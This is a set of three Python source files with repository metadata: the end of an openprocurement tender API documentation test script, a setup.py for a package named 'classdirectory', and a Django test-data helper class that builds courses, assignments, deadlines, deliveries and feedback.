{'data': {
'tenderers': bid2['data']["tenderers"],
'lotValues': [{"value": {"amount": 500}, 'relatedLot': lot_id1}, { "value": {"amount": 500}, 'relatedLot': lot_id2}]}})
self.assertEqual(response.status, '201 Created')
bid2_id = response.json['data']['id']
bid2_token = response.json['access']['token']
with open('docs/source/multiple_lots_tutorial/tender-invalid-all-bids.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/lots/{}?acc_token={}'.format(tender_id, lot_id2, owner_token), {'data': {'value': {'amount': 400}}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/multiple_lots_tutorial/bid-lot1-invalid-view.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid1_id, bid1_token))
self.assertEqual(response.status, '200 OK')
with open('docs/source/multiple_lots_tutorial/bid-lot1-update-view.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid1_id, bid1_token),
{'data': {'lotValues': [{
"value": {"amount": 500}, 'relatedLot': lot_id1}], 'status': 'pending'}})
self.assertEqual(response.status, '200 OK')
with open('docs/source/multiple_lots_tutorial/bid-lot2-update-view.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/bids/{}?acc_token={}'.format(tender_id, bid2_id, bid2_token),
{'data': {'lotValues': [{"value": {"amount": 500}, 'relatedLot': lot_id1}], 'status': 'pending'}})
self.assertEqual(response.status, '200 OK')
# switch to active.pre-qualification
self.time_shift('active.pre-qualification')
self.check_chronograph()
with open('docs/source/multiple_lots_tutorial/tender-view-pre-qualification.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}?acc_token={}'.format(tender_id, owner_token))
self.assertEqual(response.status, '200 OK')
with open('docs/source/multiple_lots_tutorial/qualifications-view.http', 'w') as self.app.file_obj:
response = self.app.get('/tenders/{}/qualifications?acc_token={}'.format(self.tender_id, owner_token))
self.assertEqual(response.content_type, 'application/json')
qualifications = response.json['data']
with open('docs/source/multiple_lots_tutorial/tender-activate-qualifications.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualifications[0]['id'], owner_token),
{"data": {'status': 'active'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['status'], 'active')
response = self.app.patch_json('/tenders/{}/qualifications/{}?acc_token={}'.format(self.tender_id, qualifications[1]['id'], owner_token),
{"data": {'status': 'active'}})
self.assertEqual(response.status, '200 OK')
self.assertEqual(response.json['data']['status'], 'active')
with open('docs/source/multiple_lots_tutorial/tender-view-pre-qualification-stand-still.http', 'w') as self.app.file_obj:
response = self.app.patch_json('/tenders/{}?acc_token={}'.format(tender_id, owner_token),
{"data": {"status": "active.pre-qualification.stand-still"}})
self.assertEqual(response.status, "200 OK")
| {
"content_hash": "91730f182087ea4c138c09cd71f2bb12",
"timestamp": "",
"source": "github",
"line_count": 1621,
"max_line_length": 218,
"avg_line_length": 52.69956816779766,
"alnum_prop": 0.5818369114789408,
"repo_name": "rialto-px/openprocurement.tender.twostage",
"id": "3c1d6d98693e97fb9512c794afc79e64ee1172e5",
"size": "86987",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1173747"
}
],
"symlink_target": ""
} |
import os
from setuptools import find_packages, setup

# Long description is taken verbatim from the package README.
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
    README = readme.read()

# allow setup.py to be run from any path
os.chdir(os.path.normpath(os.path.join(os.path.abspath(__file__), os.pardir)))

setup(
    name='classdirectory',
    version='0.1.2',
    packages=find_packages(exclude=['ez_setup']),
    include_package_data=True,
    license='MIT',
    description='Find classmates in module.',
    long_description=README,
    url='https://github.com/fly/classdirectory',
    author='Jon Chen',
    author_email='bsd@voltaire.sh',
    classifiers=[
        'Intended Audience :: Developers',
        # FIX: classifier previously declared Apache while license='MIT';
        # the two must agree — the package is MIT-licensed.
        'License :: OSI Approved :: MIT License',
        'Operating System :: POSIX :: Linux',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
    ],
)
| {
"content_hash": "c4627138399d0e651f6dbeff23c8c589",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 78,
"avg_line_length": 32.25,
"alnum_prop": 0.6346899224806202,
"repo_name": "bsdlp/classdirectory",
"id": "19942877a03d76d6f264f10cf4057eeec74e3f6f",
"size": "1055",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "3022"
}
],
"symlink_target": ""
} |
from datetime import datetime, timedelta
from django.contrib.auth.models import User
from models import (Node, Subject, Period, Assignment, AssignmentGroup,
Candidate, Deadline, Delivery, StaticFeedback, FileMeta)
from deliverystore import MemoryDeliveryStore
from django.core.exceptions import ValidationError
class TestHelper(object):
"""
This class helps generate test data.
"""
class IllegalTypeException(Exception):
    """Raised when a helper receives an argument of an unsupported type
    (e.g. ``add_delivery``'s *delivered_by* that is neither User nor
    Candidate)."""
    pass
@classmethod
def set_memory_deliverystore(cls):
    # Point FileMeta at MemoryDeliveryStore so generated test data is
    # stored in memory rather than through the default delivery store.
    FileMeta.deliverystore = MemoryDeliveryStore()
def create_user(self, name):
    """Create, validate and save a User named *name* (password 'test').

    The user is also exposed as ``self.<name>`` for convenient access
    from tests.
    """
    user = User(username=name)
    user.set_password('test')
    user.full_clean()
    user.save()
    # setattr is the idiomatic equivalent of the original
    # ``vars(self)[name] = user`` write into the instance dict.
    setattr(self, name, user)
def refresh_var(self, obj):
    """Re-fetch *obj* from the database and swap the fresh copy into
    every attribute of *self* that currently equals *obj*."""
    reloaded = type(obj).objects.get(pk=obj.pk)
    attrs = vars(self)
    for name, value in list(attrs.items()):
        if value == obj:
            attrs[name] = reloaded
def create_superuser(self, name):
    """Create, validate and save a superuser named *name* (password
    'test'), exposing it as ``self.<name>``."""
    superuser = User(username=name, is_superuser=True)
    superuser.set_password("test")
    superuser.full_clean()
    superuser.save()
    setattr(self, name, superuser)
def add_delivery(self, assignmentgroup, files={}, after_last_deadline=False, delivered_by=None, successful=True):
    """
    Create a Delivery on *assignmentgroup*'s active deadline.

    :param assignmentgroup: an AssignmentGroup object or a string path
        to one (resolved via ``get_object_from_path``). Mandatory;
        ``None`` is silently ignored (returns ``None``).
    :param files: a dictionary with key/values as file name and
        file content as described in Delivery.add_file().
    :param after_last_deadline: if true, sets time_of_delivery 1
        day later than the assignmentgroup's active deadline.
    :param delivered_by: a User or Candidate; defaults to the group's
        first candidate. Anything else raises IllegalTypeException.
    :param successful: stored on ``delivery.successful``.
    :return: the saved Delivery. It is also recorded on *self* in the
        ``<subject>_<period>_<assignment>_<group>_deliveries`` list and
        under ``..._deadline<X>_delivery<Y>``.
    """
    # TODO: add timestamp-parameter for time_of_delivery
    if assignmentgroup == None:
        return
    # Check if we're given a group, or fetch from a path
    if type(assignmentgroup) == AssignmentGroup:
        group = assignmentgroup
    elif type(assignmentgroup) == str:
        group = self.get_object_from_path(assignmentgroup)
    # Get the user/candidate to deliver
    delivered_by_to_use = None
    if delivered_by:
        if type(delivered_by) == User:
            # find the Candidate within the group that wraps this User
            for can in group.candidates.all():
                if can.student.username == delivered_by.username:
                    delivered_by_to_use = can
                    break
        elif type(delivered_by) == Candidate:
            # match by the wrapped student's username, not object identity
            for can in group.candidates.all():
                if can.student.username == delivered_by.student.username:
                    delivered_by_to_use = can
                    break
        else:
            raise self.IllegalTypeException("delivered_by must be either a User or a Candidate.")
    else:
        delivered_by_to_use = group.candidates.all()[0]
    # Create the delivery
    #delivery = group.deliveries.create(delivered_by=delivered_by_to_use, successful=False)
    delivery = group.get_active_deadline().deliveries.create(delivered_by=delivered_by_to_use, successful=False)
    # add files if there are any
    for filename in files.keys():
        delivery.add_file(filename, files[filename])
    if after_last_deadline:
        # set the deliverytime to after the deadline
        delivery.time_of_delivery = group.get_active_deadline().deadline + timedelta(days=1)
    delivery.successful = successful
    delivery.full_clean()
    delivery.save()
    # add it to the groups delivery list
    prefix = (group.parentnode.parentnode.parentnode.short_name + '_' +  # subject_
              group.parentnode.parentnode.short_name + '_' +  # period_
              group.parentnode.short_name + '_' +  # assignment_
              group.name + '_')
    varname = prefix + 'deliveries'
    if varname in vars(self).keys():
        vars(self)[varname].append(delivery)
    else:
        vars(self)[varname] = [delivery]
    # adds a variable with the name formatted as:
    # subject_period_assignment_group_deadline<X>_delivery<Y>
    # where X is the deadline the delivery belongs to, and Y is
    # a number that starts at 1 and increments for each new delivery
    prefix = prefix + 'deadline' + str(group.deadlines.count()) + '_'
    deadline_num = group.get_active_deadline().deliveries.count()
    vars(self)[prefix + 'delivery' + str(deadline_num)] = delivery
    return delivery
def add_feedback(self, delivery=None, verdict=None, examiner=None, timestamp=None):
    """
    Create and save a StaticFeedback for *delivery*.

    :param delivery: either a Delivery object or a string path to
        an assignmentgroup, where we take the last delivery made. This
        is the only mandatory parameter.
    :param verdict: a dict containing grade, score and passing
        grade. Defaults to grade='A', points=100, is_passing_grade=True.
    :param examiner: A User object. Defaults to the first examiner
        for the delivery's assignment group.
    :param timestamp: A datetime object for when the feedback was
        saved. Defaults to the group's active deadline.
    :return: the saved StaticFeedback, also appended to
        ``self.<subject>_<period>_<assignment>_<group>_feedbacks``.
    """
    # get the delivery object
    if type(delivery) == str:
        # since we cant create a path directly to a delivery,
        # expect an assignmentgroup path
        delivery = self.get_object_from_path(delivery)
    # if the path led to an AssignmentGroup, get that groups
    # latest delivery
    if type(delivery) == AssignmentGroup:
        # BUGFIX: order descending so index 0 is the *latest* delivery;
        # the previous ascending order_by returned the earliest one,
        # contradicting the documented behaviour.
        delivery = delivery.get_active_deadline().deliveries.all().order_by('-time_of_delivery')[0]
    # if none of the above, expect we were given a Delivery
    if not type(delivery) == Delivery:
        # BUGFIX: use repr() so a non-string argument raises ValueError
        # as intended instead of TypeError from str concatenation.
        raise ValueError('Invalid delivery given. Got ' + repr(delivery))
    # get the verdict
    if not verdict:
        verdict = {'grade': 'A', 'points': 100, 'is_passing_grade': True}
    # get the examiner
    if not examiner:
        examiner = delivery.deadline.assignment_group.examiners.all()[0].user
    # get the timestamp
    if not timestamp:
        timestamp = delivery.deadline.assignment_group.get_active_deadline().deadline
    # NOTE(review): *timestamp* is computed but never applied to the
    # feedback below — confirm the intended StaticFeedback field.
    # create the feedback
    feedback = StaticFeedback(saved_by=examiner, delivery=delivery, grade=verdict['grade'],
                              points=verdict['points'], is_passing_grade=verdict['is_passing_grade'],
                              rendered_view='This is a default static feedback')
    # save it (the original wrapped this in a try/except that only
    # re-raised ValidationError — a no-op, removed)
    feedback.full_clean()
    feedback.save()
    # add it to the groups feedbacks list
    group = delivery.deadline.assignment_group
    varname = (group.parentnode.parentnode.parentnode.short_name + '_' +  # subject_
               group.parentnode.parentnode.short_name + '_' +  # period_
               group.parentnode.short_name + '_' +  # assignment_
               group.name + '_feedbacks')
    if varname in vars(self):
        vars(self)[varname].append(feedback)
    else:
        vars(self)[varname] = [feedback]
    return feedback
def _parse_extras(self, text, allowed_extras=[]):
"""Parse an 'extras' string. Separate at ':', and create a
key/value pair of name/value
"""
res = {}
for extra in allowed_extras:
res[extra] = []
# res = {'admin': [], 'examiner': [], 'candidate': [], 'when': []}
if not text:
return res
sections = text.split(':')
for section in sections:
key = section[:section.index('(')]
if key not in res:
raise ValueError("{0} is not an allowed command.".format(key))
res[key] = section[section.index('(') + 1 : section.index(')')].split(',')
return res
def _create_or_add_user(self, name):
    """Get or create a User *name* (password 'test', synthesized email),
    exposing it as ``self.<username>``."""
    account = User(username=name, email="%s@example.com" % name.strip())
    account.set_password("test")
    try:
        account.full_clean()
        account.save()
    except ValidationError:
        # A user with this username already exists — reuse it.
        account = User.objects.get(username=name)
    setattr(self, account.username, account)
    return account
#######
##
## Node specifics
##
#######
def _create_or_add_node(self, parent, name, users):
    """Get or create a Node *name* under *parent*, applying the 'admin'
    and 'ln' extras, and expose it on *self* under its dotted path with
    '.' replaced by '_'."""
    node = Node(parentnode=parent, short_name=name, long_name=name.capitalize())
    try:
        node.full_clean()
        node.save()
    except ValidationError:
        # Node already exists at this position — load it instead.
        node = Node.objects.get(parentnode=parent, short_name=name)
    # allowed roles in node are:
    for admin_name in users['admin']:
        node.admins.add(self._create_or_add_user(admin_name))
    if users['ln']:
        node.long_name = users['ln'][0]
    node.full_clean()
    node.save()
    attr_name = node.get_path().replace('.', '_')
    vars(self)[attr_name] = node
    return node
def _do_the_nodes(self, nodes):
    """Create a chain of nodes from a dotted spec such as
    ``'uni:admin(bob).dept'``; each dot-separated segment may carry
    ':extras'. Returns the deepest node, or None for an empty spec."""
    if not nodes:
        return None
    parent = None
    for segment in nodes.split('.'):
        node_name, sep, extras_arg = segment.partition(':')
        users = self._parse_extras(extras_arg if sep else None, ['admin', 'ln'])
        parent = self._create_or_add_node(parent, node_name, users)
    return parent
#######
##
## Subject specifics
##
#######
def _create_or_add_subject(self, subject_name, parentnode, extras):
    """Get or create a Subject under *parentnode*, applying the 'admin'
    and 'ln' extras, and expose it as ``self.<short_name>``."""
    subject = Subject(parentnode=parentnode, short_name=subject_name, long_name=subject_name.capitalize())
    try:
        subject.full_clean()
        subject.save()
    except ValidationError:
        # short_name collision: reuse the existing subject.
        subject = Subject.objects.get(short_name=subject_name)
    # only admins are allowed as user-extras in a subject
    for admin_name in extras['admin']:
        subject.admins.add(self._create_or_add_user(admin_name))
    # if a long_name is given, set it
    if extras['ln']:
        subject.long_name = extras['ln'][0]
    subject.full_clean()
    subject.save()
    setattr(self, subject.short_name, subject)
    return subject
def _do_the_subjects(self, node, subject_list):
    """Create every subject in ``subject_list`` under ``node``.

    Each entry is 'name' or 'name:extras'; allowed extras are 'admin'
    and 'ln'. Returns the list of created/fetched subjects.
    """
    created = []
    for entry in subject_list:
        name, sep, extras_arg = entry.partition(':')
        if not sep:
            extras_arg = None
        extras = self._parse_extras(extras_arg, ['admin', 'ln'])
        created.append(self._create_or_add_subject(name, node, extras))
    return created
#######
##
## Period specifics
##
#######
def _create_or_add_period(self, period_name, parentnode, extras):
    """Create (or fetch) a Period under subject ``parentnode`` and apply extras.

    Extras:
        admin:  usernames added as period admins.
        begins: months from now until the period starts.
        ends:   months (counted from the start time) until the period ends.
                When only 'begins' is given, the default 5-month duration
                is kept but re-anchored at the new start time.
        ln:     replacement long name.

    The period is bound on this helper as '<subject>_<period>'.
    """
    # A "month" is approximated as 30 days throughout this helper.
    period = Period(parentnode=parentnode, short_name=period_name,
                    long_name=period_name.capitalize(),
                    start_time=datetime.now(),
                    end_time=datetime.now() + timedelta(days=5 * 30))
    try:
        period.full_clean()
        period.save()
    except ValidationError:
        # Already present; load the existing period instead.
        period = Period.objects.get(parentnode=parentnode,
                                    short_name=period_name)
    # Admins are the only user role allowed on periods.
    for admin in extras['admin']:
        period.admins.add(self._create_or_add_user(admin))
    if extras['begins']:
        period.start_time = datetime.now() + timedelta(
            days=int(extras['begins'][0]) * 30)
    if extras['ends']:
        period.end_time = period.start_time + timedelta(
            days=int(extras['ends'][0]) * 30)
    elif extras['begins']:
        # 'begins' without 'ends' (the old `and not extras['ends']` guard
        # was redundant inside this elif): keep the default 5-month
        # duration, anchored at the new start time.
        period.end_time = period.start_time + timedelta(days=5 * 30)
    if extras['ln']:
        period.long_name = extras['ln'][0]
    period.full_clean()
    period.save()
    vars(self)[parentnode.short_name + '_' + period.short_name] = period
    return period
def _do_the_periods(self, subjects, periods_list):
    """Create every period in ``periods_list`` under each subject.

    Allowed extras per entry: admin, begins, ends, ln. Returns the flat
    list of created/fetched periods.
    """
    created = []
    for subject in subjects:
        for entry in periods_list:
            name, sep, extras_arg = entry.partition(':')
            if not sep:
                extras_arg = None
            extras = self._parse_extras(
                extras_arg, ['admin', 'begins', 'ends', 'ln'])
            created.append(self._create_or_add_period(name, subject, extras))
    return created
#######
##
## Assignment specifics
##
#######
def _create_or_add_assignment(self, assignment_name, parentnode, extras):
    """Create (or fetch) an Assignment under period ``parentnode``.

    Extras:
        admin: usernames added as assignment admins.
        pub:   days to shift the publishing time from the period start.
        anon:  'true'/'false' toggles anonymous mode.

    Bound on this helper as '<subject>_<period>_<assignment>'.

    Raises:
        ValueError: if the 'anon' extra is not 'true' or 'false'.
    """
    assignment = Assignment(parentnode=parentnode,
                            short_name=assignment_name,
                            long_name=assignment_name.capitalize(),
                            publishing_time=parentnode.start_time)
    try:
        assignment.full_clean()
        assignment.save()
    except ValidationError:
        # Already present; load the existing assignment instead.
        assignment = Assignment.objects.get(parentnode=parentnode,
                                            short_name=assignment_name)
    # Admins are the only user role allowed on assignments.
    for username in extras['admin']:
        assignment.admins.add(self._create_or_add_user(username))
    if extras['pub']:
        assignment.publishing_time += timedelta(days=int(extras['pub'][0]))
    if extras['anon']:
        flag = extras['anon'][0]
        if flag == 'true':
            assignment.anonymous = True
        elif flag == 'false':
            assignment.anonymous = False
        else:
            raise ValueError("anon must be 'true' or 'false'")
    assignment.full_clean()
    assignment.save()
    # Variable name is '<subject>_<period>_<assignment>'.
    vars(self)[parentnode.parentnode.short_name + '_' +
               parentnode.short_name + '_' +
               assignment.short_name] = assignment
    return assignment
def _do_the_assignments(self, periods, assignments_list):
    """Create every assignment in ``assignments_list`` under each period.

    Allowed extras per entry: admin, pub, anon. Returns the flat list of
    created/fetched assignments.
    """
    created = []
    for period in periods:
        for entry in assignments_list:
            name, sep, extras_arg = entry.partition(':')
            if not sep:
                extras_arg = None
            extras = self._parse_extras(extras_arg, ['admin', 'pub', 'anon'])
            created.append(
                self._create_or_add_assignment(name, period, extras))
    return created
#######
##
## Assignmentgroups specifics
##
#######
def _create_or_add_assignmentgroup(self, group_name, parentnode, extras):
    """Create (or fetch) an AssignmentGroup under assignment ``parentnode``.

    Extras:
        candidate: usernames; each may carry an explicit candidate id as
            'name;id'.
        examiner: usernames added as examiners.

    The group is bound on this helper as
    '<subject>_<period>_<assignment>_<group>'.

    Raises:
        ValueError: if a newly created group fails validation.
    """
    if AssignmentGroup.objects.filter(parentnode=parentnode, name=group_name).count() == 1:
        group = AssignmentGroup.objects.get(parentnode=parentnode, name=group_name)
    else:
        group = AssignmentGroup(parentnode=parentnode, name=group_name)
        try:
            group.full_clean()
            group.save()
        except ValidationError:
            raise ValueError("Assignmentgroup not created!")
    for candidate in extras['candidate']:
        try:
            # 'name;id' supplies an explicit candidate id.
            candidate_name, cid = candidate.split(';', 1)
        except ValueError:
            candidate_name = candidate
            cid = None
        group.candidates.add(Candidate(student=self._create_or_add_user(candidate_name)))
        # The row just added has the highest primary key; fetch it back
        # so the extra candidate fields can be set and saved.
        cand = group.candidates.order_by('-id')[0]
        #cand.candidate_id = cid if cid != None else str(cand.student.id)
        cand.candidate_id = cid
        cand.update_identifier(parentnode.anonymous)
        cand.full_clean()
        cand.save()
    for examiner in extras['examiner']:
        group.examiners.create(user=self._create_or_add_user(examiner))
    group.full_clean()
    group.save()
    # Variable name is '<subject>_<period>_<assignment>_<group>'.
    vars(self)[parentnode.parentnode.parentnode.short_name + '_' + # subject_
               parentnode.parentnode.short_name + '_' + # period_
               parentnode.short_name + '_' + # assignment_
               group_name] = group
    # # create the default deadline, deadline0, variable
    # vars(self)[parentnode.parentnode.parentnode.short_name + '_' + # subject_
    #            parentnode.parentnode.short_name + '_' + # period_
    #            parentnode.short_name + '_' + # assignment_
    #            group_name + '_deadline0'] = group.deadlines.all()[0]
    return group
def _do_the_assignmentgroups(self, assignments, assignmentgroups_list):
    """Create every group in ``assignmentgroups_list`` under each assignment.

    Allowed extras per entry: examiner, candidate, candidate_id. Returns
    the flat list of created/fetched groups.
    """
    created = []
    for assignment in assignments:
        for entry in assignmentgroups_list:
            name, sep, extras_arg = entry.partition(':')
            if not sep:
                extras_arg = None
            extras = self._parse_extras(
                extras_arg, ['examiner', 'candidate', 'candidate_id'])
            created.append(
                self._create_or_add_assignmentgroup(name, assignment, extras))
    return created
#######
##
## Deadlines specifics
##
#######
def _create_or_add_deadline(self, deadline_name, parentnode, extras):
    """Create a new Deadline on assignment group ``parentnode``.

    The deadline defaults to 10 days after the assignment's publishing
    time. Extras:
        ends: days after the publishing time when the deadline expires.
        text: deadline text.

    Several helper variables are bound on this instance, all prefixed
    with '<subject>_<period>_<assignment>_<group>_':
      * '<prefix><deadline_name>'   (only when a name was given)
      * '<prefix>deadlines'         list of deadlines created so far
      * '<prefix>deadline<N>'       N-th created deadline (1-based)
      * '<prefix>deadline0'         the group's earliest deadline
                                    (the auto-created default)

    Raises:
        ValueError: if the new deadline fails validation.
    """
    deadline = Deadline(assignment_group=parentnode, deadline=parentnode.parentnode.publishing_time + timedelta(days=10))
    try:
        deadline.full_clean()
        deadline.save()
    except ValidationError:
        raise ValueError("something impossible happened when creating deadline")
    if extras['ends']:
        # timedelta's first positional argument is days.
        deadline.deadline = parentnode.parentnode.publishing_time + timedelta(int(extras['ends'][0]))
    if extras['text']:
        deadline.text = extras['text'][0]
    # create the variable ref'ing directly to the deadline
    prefix = (parentnode.parentnode.parentnode.parentnode.short_name + '_' + # subject_
              parentnode.parentnode.parentnode.short_name + '_' + # period_
              parentnode.parentnode.short_name + '_' + # assignment_
              parentnode.name + '_')
    deadline.full_clean()
    deadline.save()
    # only create this variable if a name is given
    if deadline_name:
        varname = prefix + deadline_name
        vars(self)[varname] = deadline
    # Add or append to the deadlines list. Last element will be
    # the same as the most recently created deadline, stored in
    # prefix+deadline_name
    vardict = prefix + 'deadlines'
    if vardict in vars(self).keys():
        vars(self)[vardict].append(deadline)
    else:
        vars(self)[vardict] = [deadline]
    # Create a variable with the name formatted as:
    # subject_period_assignment_group_deadline<X> where X
    # starts at 1 and increments for each deadline added to
    # this group
    vars(self)[prefix + 'deadline' + str(len(vars(self)[vardict]))] = deadline
    # check if the default deadline, deadline0, variable exists
    default_deadline_var = prefix + 'deadline0'
    if default_deadline_var not in vars(self).keys():
        vars(self)[default_deadline_var] = parentnode.deadlines.order_by('deadline')[0]
    return deadline
def _do_the_deadlines(self, assignmentgroups, deadlines_list):
    """Create every deadline in ``deadlines_list`` on each group.

    Allowed extras per entry: ends, text. Returns the flat list of
    created deadlines.
    """
    created = []
    for group in assignmentgroups:
        for entry in deadlines_list:
            name, sep, extras_arg = entry.partition(':')
            if not sep:
                extras_arg = None
            extras = self._parse_extras(extras_arg, ['ends', 'text'])
            created.append(self._create_or_add_deadline(name, group, extras))
    return created
def _validate_args(self, args):
i = 0
while i < len(args):
arg = args[i]
i += 1
# look for the first none
if not arg:
while i < len(args):
# if any args are not-None, return false
if args[i]:
return False
i += 1
return True
def add(self, nodes=None, subjects=None, periods=None, assignments=None, assignmentgroups=None,
        delivery=None, feedback=None, deadlines=None):
    """Create a hierarchy of core objects in one call.

    Each keyword is a spec for one level (see the _do_the_* helpers for
    the spec formats). Creation cascades top-down and stops at the first
    level that was not supplied; supplying a lower level without every
    level above it is invalid.

    NOTE(review): delivery/feedback participate in the ordering check but
    are never created here -- presumably handled by add_delivery() /
    add_feedback(); confirm.

    Raises:
        ValueError: if a lower level is given while a higher one is missing.
    """
    # see if any of the parameters 'below' are !None
    args = [subjects, periods, assignments, assignmentgroups, deadlines, delivery, feedback]
    if not self._validate_args(args):
        raise ValueError('Invalid parameters. ')
    if not nodes:
        return
    nodes = self._do_the_nodes(nodes)
    if not subjects:
        return
    subjects = self._do_the_subjects(nodes, subjects)
    if not periods:
        return
    periods = self._do_the_periods(subjects, periods)
    if not assignments:
        return
    assignments = self._do_the_assignments(periods, assignments)
    if not assignmentgroups:
        return
    assignmentgroups = self._do_the_assignmentgroups(assignments, assignmentgroups)
    if not deadlines:
        return
    deadlines = self._do_the_deadlines(assignmentgroups, deadlines)
def add_to_path(self, path):
    """Create a node-to-deadline chain from a single path string.

    ``path`` looks like 'nodes;subject.period.assignment.group.deadline'
    where everything after the first ';' is dot-separated and trailing
    components are optional. Splits the path and delegates to add().
    """
    nodes, rest = path.split(';', 1)
    parts = rest.split('.')
    slots = ['subjects', 'periods', 'assignments', 'assignmentgroups',
             'deadlines']
    kwargs = dict.fromkeys(slots)
    # Fill slots in order; zip stops at the shorter sequence, so missing
    # trailing components stay None and surplus components are ignored.
    for slot, part in zip(slots, parts):
        kwargs[slot] = [part]
    self.add(nodes=nodes, **kwargs)
def get_object_from_path(self, path):
    """Look up an object previously bound on this helper by its path.

    ``path`` is '<nodes>;<dotted.path>' or just '<dotted.path>'; the part
    after the ';' with dots replaced by underscores is the attribute name.
    """
    head, sep, rest = path.partition(';')
    if not sep:
        # No ';' separator: the whole path names the attribute.
        rest = path
    return vars(self)[rest.replace('.', '_')]
def load_generic_scenario(self):
    """Populate the database with a small generic university scenario.

    Creates node 'uni' with subjects cs101/cs110/cs111, two periods each,
    assignments, groups with candidates/examiners and deadlines, then
    adds deliveries and feedbacks via add_delivery()/add_feedback().
    """
    # set up the base structure
    self.add(nodes='uni:admin(mortend)',
             subjects=['cs101:admin(admin1,admin2):ln(Basic OO programming)',
                       'cs110:admin(admin3,admin4):ln(Basic scientific programming)',
                       # Bug fix: 'damin3' was a typo that silently created a
                       # separate user instead of reusing admin3.
                       'cs111:admin(admin1,admin3):ln(Advanced OO programming)'],
             periods=['fall11', 'spring11:begins(6)'])
    # add 4 assignments to inf101 and inf110 in fall and spring
    self.add(nodes='uni',
             subjects=['cs101', 'cs110'],
             periods=['fall11', 'spring11'],
             assignments=['a1', 'a2'])
    # add 12 assignments to inf111 fall and spring.
    self.add(nodes='uni',
             subjects=['cs111'],
             periods=['fall11', 'spring11'],
             assignments=['week1', 'week2', 'week3', 'week4'])
    # set up some students with descriptive names
    # inf101 is so easy, everyone passes
    self.add_to_path('uni;cs101.fall11.a1.g1:candidate(goodStud1):examiner(examiner1).dl:ends(5)')
    self.add_to_path('uni;cs101.fall11.a1.g2:candidate(goodStud2):examiner(examiner1).dl:ends(5)')
    self.add_to_path('uni;cs101.fall11.a1.g3:candidate(badStud3):examiner(examiner2).dl:ends(5)')
    self.add_to_path('uni;cs101.fall11.a1.g4:candidate(okStud4):examiner(examiner2).dl:ends(5)')
    self.add_to_path('uni;cs101.fall11.a2.g1:candidate(goodStud1):examiner(examiner1).dl:ends(5)')
    self.add_to_path('uni;cs101.fall11.a2.g2:candidate(goodStud2):examiner(examiner1).dl:ends(5)')
    self.add_to_path('uni;cs101.fall11.a2.g3:candidate(badStud3):examiner(examiner2).dl:ends(5)')
    self.add_to_path('uni;cs101.fall11.a2.g4:candidate(okStud4):examiner(examiner2).dl:ends(5)')
    # inf110 is an easy group-project, everyone passes
    # Bug fix: two paths below used '.dl.ends(14)' instead of '.dl:ends(14)';
    # since the path is split on '.', the ends(14) extra was silently dropped.
    self.add_to_path('uni;cs110.fall11.a1.g1:candidate(goodStud1,goodStud2):examiner(examiner1).dl:ends(14)')
    self.add_to_path('uni;cs110.fall11.a1.g2:candidate(badStud3,okStud4):examiner(examiner2).dl:ends(14)')
    self.add_to_path('uni;cs110.fall11.a2.g1:candidate(goodStud1,goodStud2):examiner(examiner1).dl:ends(14)')
    self.add_to_path('uni;cs110.fall11.a2.g2:candidate(badStud3,okStud4):examiner(examiner2).dl:ends(14)')
    # inf111 is hard! Everyone passes week1
    self.add_to_path('uni;cs111.fall11.week1.g1:candidate(goodStud1):examiner(examiner3).dl:ends(5)')
    self.add_to_path('uni;cs111.fall11.week1.g2:candidate(goodStud2):examiner(examiner3).dl:ends(5)')
    self.add_to_path('uni;cs111.fall11.week1.g3:candidate(badStud3):examiner(examiner3).dl:ends(5)')
    self.add_to_path('uni;cs111.fall11.week1.g4:candidate(okStud4):examiner(examiner3).dl:ends(5)')
    # and 2
    self.add_to_path('uni;cs111.fall11.week2.g1:candidate(goodStud1):examiner(examiner3).dl:ends(5)')
    self.add_to_path('uni;cs111.fall11.week2.g2:candidate(goodStud2):examiner(examiner3).dl:ends(5)')
    self.add_to_path('uni;cs111.fall11.week2.g3:candidate(badStud3):examiner(examiner3).dl:ends(5)')
    self.add_to_path('uni;cs111.fall11.week2.g4:candidate(okStud4):examiner(examiner3).dl:ends(5)')
    # badStud4 fails at week3
    self.add_to_path('uni;cs111.fall11.week3.g1:candidate(goodStud1):examiner(examiner3).dl:ends(5)')
    self.add_to_path('uni;cs111.fall11.week3.g2:candidate(goodStud2):examiner(examiner3).dl:ends(5)')
    # TODO(review): 'okStud2' looks like a typo for okStud4 (cf. the other
    # g4 groups) -- confirm before changing the scenario.
    self.add_to_path('uni;cs111.fall11.week3.g4:candidate(okStud2):examiner(examiner3).dl:ends(5)')
    # and okStud4 fails at week4
    self.add_to_path('uni;cs111.fall11.week4.g1:candidate(goodStud1):examiner(examiner3).dl:ends(5)')
    self.add_to_path('uni;cs111.fall11.week4.g2:candidate(goodStud2):examiner(examiner3).dl:ends(5)')
    # deliveries
    goodFile = {'good.py': ['print ', 'awesome']}
    okFile = {'ok.py': ['print ', 'meh']}
    badFile = {'bad.py': ['print ', 'bah']}
    # cs101
    self.add_delivery('cs101.fall11.a1.g1', goodFile)
    self.add_delivery('cs101.fall11.a1.g2', goodFile)
    self.add_delivery('cs101.fall11.a1.g3', badFile)
    self.add_delivery('cs101.fall11.a1.g4', okFile)
    self.add_delivery('cs101.fall11.a2.g1', goodFile)
    self.add_delivery('cs101.fall11.a2.g2', goodFile)
    self.add_delivery('cs101.fall11.a2.g3', badFile)
    self.add_delivery('cs101.fall11.a2.g4', okFile)
    # cs110
